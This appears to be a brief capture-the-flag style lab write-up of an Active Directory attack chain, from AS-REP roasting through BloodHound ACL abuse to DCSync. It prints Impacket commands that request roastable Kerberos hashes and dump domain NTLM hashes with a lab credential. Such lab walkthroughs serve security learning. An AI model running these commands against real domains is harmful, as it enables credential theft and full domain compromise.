Skip to content

xomnibot@lab:~/writeups/tryhackme-ad-enterprise-chain$

HardActive Directory

Active Directory Attack Chain: AS-REP Roasting to DCSync

Full attack path from unauthenticated AS-REP roasting to BloodHound ACL traversal and DCSync domain compromise.

1 min read
On this page

Lab Details

Objectives
  • Request TGT hashes via GetNPUsers.py.
  • Crack hashes using Hashcat mode 18200.
  • Execute DCSync via secretsdump.py.
Prerequisites
Kerberos Authentication ProtocolsImpacket Framework
Tools
ImpacketBloodHoundHashcatEvil-WinRM

Overview

Active Directory misconfigurations allow rapid lateral movement. This walkthrough covers kerberos roasting and ACL exploitation.

Key Exploitation Steps

  1. AS-REP Roasting:

    Terminal window
    GetNPUsers.py CORP.LOCAL/ -no-pass -usersfile users.txt -dc-ip 10.10.120.5
  2. Privilege Escalation via BloodHound: Compromised account possessed GenericAll rights over svc_sql, which held DCSync permissions.

  3. DCSync Domain Takeover:

    Terminal window
    secretsdump.py CORP.LOCAL/svc_sql:'Pass123!'@10.10.120.5 -just-dc-ntlm